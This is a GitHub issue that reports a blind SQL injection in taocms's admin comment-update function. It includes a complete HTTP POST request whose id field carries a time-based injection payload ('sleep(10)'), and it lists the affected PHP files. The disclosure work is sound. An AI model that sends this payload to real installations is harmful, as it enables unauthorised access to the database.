Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

There is SQL blind injection at "Comment Update" #23

Open
xuchaofan opened this issue Jan 17, 2022 · 0 comments
Open

There is SQL blind injection at "Comment Update" #23

xuchaofan opened this issue Jan 17, 2022 · 0 comments

Comments

@xuchaofan
Copy link 

POST /admin/admin.php HTTP/1.1
Host: taocms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://taocms.test/admin/admin.php?action=comment&ctrl=lists
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=q6dpqahlf85bhelm9luc2i6jp3;XDEBUG_SESSION=PHPSTORM
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

action=comment&id=5)and(sleep(10))--+&ctrl=update&name=a

image
image

image

admin/admin.php
image

include/Model/Comment.php
image

include/Model/Article.php
image

include/Db/Mysql.php
image

include/Db/Mysql.php
image
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@xuchaofan